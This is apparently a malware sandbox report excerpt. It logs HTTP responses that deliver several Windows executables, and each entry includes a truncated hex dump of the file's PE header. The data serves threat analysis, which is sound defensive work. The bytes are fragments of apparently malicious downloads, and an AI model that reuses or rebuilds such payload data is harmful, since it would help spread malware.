00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 04 03 00 00 20 00 00 00 06 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 03 00 00 08 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 03 00 00 02 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 24 03 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 16 03 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c9 1c 4d 4c b3 55 fa 96 5f cb 26 d0 44 d4 8c 06 58 35 71 b8 cf f8 95 cb 17 80 f5 4d 2d b0 4e 34 d9 f4 68 42 4b 2b 64 e9 36 30 82 d5 10 54 0f bf 53 f1 9a d0 d2 54 58 71 f4 53 f7 8c 43 61 7d fa ba 26 c7 69 41 e3 a8 9b d8 08 05 5b 37 1b d6 97 fd 8b da e3 46 b3 d7 ce e9 cb f1 03 c2 6d 91 06 f3 4b dc 53 6c 80 b4 89 d1 29 49 7d 5b 88 03 39 d7 97 52 9a bc be dd 89 e6 7a f2 ce 32 b2 28 8e e9 43 5a b2 60 3e ef d8 da fd f5 cb c0 61 aa 46 52 bb 31 d3 8a f6 24 08 b9 f9 15 09 54 00 ce 40 53 6d 33 b1 b9 49 1d 71 fe 50 44 32 37 3e 53 63 20 5b 48 cc 4f f8 31 bd 8e 4a 7b e0 e9 89 8e f0 bb 33 b2 80 fa 68 82 07 d9 98 0f 12 0c 0c 4b 87 78 28 9e e8 3c 4f 5c bc 8f b6 e6 bf 73 6f 83 fe 72 f9 06 41 34 7d ff d5 a2 2a 29 77 e1 d5 29 d9 1b 6c 45 a9 f9 ad 31 11 28 f2 3f ba 96 00 b3 52 41 13 ff 87 d1 8d b3 d9 b8 45 57 61 60 0b 82 c9 6c aa 8d ec e3 8f 0a a0 3b 26 36 88 a0 a6 98 13 32 2a 53 fa 01 57 d1 e0 6c 06 29 42 3b 5d 8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 320512Last-Modified: Tue, 03 Sep 2024 15:40:40 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d72df8-4e400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 20 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 0a 00 00 00 00 00 00 7e f6 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 18 6c 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 f6 04 00 57 00 00 00 00 00 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 ec f4 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 d6 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 00 05 00 00 08 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f6 04 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 e8 04 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c a5 fc 99 15 70 60 b9 3d 28 fe 0b 42 aa 31 87 04 ea 9a c6 e8 ac f8 56 ab 41 95 4c 66 1b b3 a4 dd d4 d2 70 45 3f 9e 05 27 a2 76 fb 6b 7a 97 47 2f 4f 4c f3 9c dd da 2a f9 38 4f 4f b7 35 d2 a5 30 52 53 1f d0 98 fd 70 0b f8 4a 8e f1 d4 cc 24 ff 92 6e 7c d6 db 5e ba b8 76 b9 19 7c 7d 8f 54 91 5b 63 72 24 6b 41 77 07 fa 91 f3 6b 7c 0e 6c 50 32 09 c6 09 bd db 86 aa a1 88 af d6 f8 55 b8 36 66 24 ea 9a 6f ea 6b 05 1c 08 9c 49 4d e3 ff f2 b3 e5 0b ac 00 ad 4a f6 be e7 f2 14 d5 30 31 7f c4 1a e5 7e 1a 17 a3 89 ea 68 7e ff 16 fb 8d d3 59 bf c0 ae 8a 72 87 3a 2f c3 93 be c0 17 5b 30 91 04 63 ff af 41 a4 5d 93 f9 88 9a 63 45 0b 7a 34 d7 17 a6 97 52 47 a0 47 cd f4 94 e3 da 7c a0 28 45 59 4a e3 65 ab 7e 89 e2 f8 68 18 b2 ce 58 05 d8 cb 76 8e 8f 25 f8 1c 36 ee 7f 9c 7d e2 f8 fa 9a 4f fc 7d 8c 3c 3a 1f f2 1a ae b8 4c 17 41 1b 60 95 63 b4 8c 33 ff 9d 8e 21 02 91 5d 0b 2f 00 7d 70 b1 1b a9 38 90 80 ba 40 4c 42 a
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:08 GMTContent-Type: application/octet-streamContent-Length: 14748160Last-Modified: Fri, 30 Aug 2024 12:15:51 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d1b7f7-e10a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 34 de 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 60 00 00 e6 0a 00 00 00 00 00 10 7c 07 00 00 10 00 00 00 40 d1 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 c0 e4 00 00 04 00 00 56 55 e1 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 dc 00 4c 04 00 00 00 e0 e1 00 95 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 00 5c fa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 56 d1 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 86 60 00 00 10 00 00 00 88 60 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c 93 70 00 00 a0 60 00 00 94 70 00 00 8c 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 77 0b 00 00 40 d1 00 00 12 08 00 00 20 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 c0 dc 00 00 06 00 00 00 32 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c fa 04 00 00 d0 dc 00 00 fc 04 00 00 38 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 d0 e1 00 00 02 00 00 00 34 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 95 d2 02 00 00 e0 e1 00 00 d4 02 00 00 36 de 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:10 GMTContent-Type: application/octet-streamContent-Length: 8684256Last-Modified: Tue, 03 Sep 2024 13:26:30 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70e86-8482e0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a8 b8 50 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 08 80 00 00 9e 03 00 00 00 00 00 ce 26 80 00 00 20 00 00 00 40 80 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 84 00 00 04 00 00 49 b2 84 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 26 80 00 4b 00 00 00 00 60 80 00 d6 97 03 00 00 00 00 00 00 00 00 00 00 aa 83 00 e0 d8 00 00 00 00 84 00 0c 00 00 00 36 26 80 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 06 80 00 00 20 00 00 00 08 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a0 02 00 00 00 40 80 00 00 04 00 00 00 0c 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d6 97 03 00 00 60 80 00 00 98 03 00 00 10 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 84 00 00 02 00 00 00 a8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 04 Sep 2024 15:37:15 GMTContent-Type: application/octet-streamContent-Length: 1776640Last-Modified: Wed, 04 Sep 2024 13:30:25 GMTConnection: keep-aliveETag: "66d860f1-1b1c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 70 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 67 00 00 04 00 00 bb fd 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6d 76 61 69 64 74 63 00 b0 19 00 00 b0 4d 00 00 a6 19 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 79 6d 79 62 79 79 6e 00 10 00 00 00 60 67 00 00 04 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 67 00 00 22 00 00 00 fa 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:16 GMTContent-Type: application/octet-streamContent-Length: 10902016Last-Modified: Thu, 22 Aug 2024 08:54:11 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66c6fcb3-a65a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 30 fc c6 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 6f 09 82 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 99 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 ef 81 01 3c 00 00 00 00 80 96 01 d0 04 03 00 40 53 96 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 81 01 28 00 00 00 00 52 96 01 38 01 00 00 00 00 00 00 00 00 00 00 00 20 f3 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f6 80 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 1f 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e8 c9 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 c6 3a 28 00 00 e0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 20 f3 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 4d a3 00 00 30 f3 00 00 4e a3 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d0 04 03 00 00 80 96 01 00 06 03 00 00 54 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:18 GMTContent-Type: application/octet-streamContent-Length: 1760552Last-Modified: Mon, 02 Sep 2024 19:06:59 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d60cd3-1add28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 4b 5a 65 25 2a 34 36 25 2a 34 36 25 2a 34 36 2c 52 b7 36 26 2a 34 36 2c 52 a7 36 34 2a 34 36 25 2a 35 36 89 2a 34 36 3e b7 9e 36 2b 2a 34 36 3e b7 ae 36 24 2a 34 36 3e b7 a9 36 24 2a 34 36 52 69 63 68 25 2a 34 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 cf e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 70 00 00 00 da 3e 00 00 42 00 00 99 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 bd 87 1b 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 30 47 00 ea f1 04 00 00 00 00 00 00 00 00 00 20 8c 1a 00 08 51 00 00 00 90 3f 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6f 00 00 00 10 00 00 00 70 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 66 3e 00 00 b0 00 00 00 02 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 20 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 ea f1 04 00 00 30 47 00 00 f2 04 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0e 32 00 00 00 30 4c 00 00 34 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 04 Sep 2024 15:37:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 